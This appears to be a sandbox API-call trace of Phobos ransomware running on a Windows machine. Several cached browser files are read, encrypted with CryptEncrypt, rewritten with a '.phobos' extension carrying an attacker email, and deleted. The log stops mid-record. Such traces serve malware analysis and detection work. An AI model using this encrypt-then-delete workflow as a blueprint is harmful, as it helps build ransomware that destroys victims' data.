(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\meversion[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\meversion[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\meversion[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\meversion[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.252] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.252] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1180, lpOverlapped=0x0) returned 1 [0189.298] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1190, dwBufLen=0x1190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1190) returned 1 [0189.298] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1190, lpOverlapped=0x0) returned 1 [0189.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0189.299] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.299] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0189.299] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.299] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0189.300] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.300] CloseHandle (hObject=0x134) returned 1 [0189.300] CloseHandle (hObject=0x194) returned 1 [0189.300] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\meversion[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\meversion[1]")) returned 1 [0189.301] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.301] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=10812) returned 1 [0189.301] CloseHandle (hObject=0x194) returned 1 [0189.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot")) returned 0x2020 [0189.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.302] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.302] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.302] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.302] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2a3c, lpOverlapped=0x0) returned 1 [0189.471] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2a40, dwBufLen=0x2a40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2a40) returned 1 [0189.471] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2a40, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2a40, lpOverlapped=0x0) returned 1 [0189.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0189.479] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.479] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0189.479] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.479] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0189.480] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.480] CloseHandle (hObject=0x194) returned 1 [0189.480] CloseHandle (hObject=0x134) returned 1 [0189.480] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\DevCMDL2.2.18[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\devcmdl2.2.18[1].eot")) returned 1 [0189.481] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.482] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=11733) returned 1 [0189.482] CloseHandle (hObject=0x134) returned 1 [0189.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[1]")) returned 0x2020 [0189.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.582] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.582] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.582] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2dd5, lpOverlapped=0x0) returned 1 [0189.593] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2de0, dwBufLen=0x2de0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2de0) returned 1 [0189.593] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2de0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2de0, lpOverlapped=0x0) returned 1 [0189.595] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0189.595] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.595] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0189.595] CryptDestroyKey (hKey=0xa32c68) returned 1 [0189.595] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0189.595] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.595] CloseHandle (hObject=0x134) returned 1 [0189.608] CloseHandle (hObject=0x194) returned 1 [0189.613] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[1]")) returned 1 [0189.614] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[2]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.615] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=11561) returned 1 [0189.615] CloseHandle (hObject=0x194) returned 1 [0189.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[2]")) returned 0x2020 [0189.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[2]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.637] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.637] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[2].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[2].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.638] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.638] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2d29, lpOverlapped=0x0) returned 1 [0189.745] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2d30, dwBufLen=0x2d30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2d30) returned 1 [0189.745] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2d30, lpOverlapped=0x0) returned 1 [0189.746] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0189.746] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.746] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0189.746] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.746] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0189.747] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.747] CloseHandle (hObject=0x194) returned 1 [0189.747] CloseHandle (hObject=0x134) returned 1 [0189.747] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[2]")) returned 1 [0189.748] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0189.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[3]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.749] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=12200) returned 1 [0189.749] CloseHandle (hObject=0x134) returned 1 [0189.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[3]")) returned 0x2020 [0189.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[3].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[3].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[3]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0189.749] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.749] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0189.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[3].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\v2[3].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0189.750] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0189.750] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.750] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2fa8, lpOverlapped=0x0) returned 1 [0189.754] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2fb0, dwBufLen=0x2fb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2fb0) returned 1 [0189.754] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2fb0, lpOverlapped=0x0) returned 1 [0189.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0189.755] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0189.755] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0189.755] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.755] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0189.755] CryptDestroyKey (hKey=0xa32a28) returned 1 [0189.755] CloseHandle (hObject=0x134) returned 1 [0189.755] CloseHandle (hObject=0x194) returned 1 [0189.755] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\v2[3]" (normalized: "c:\\users\\5p5nrgjn0js 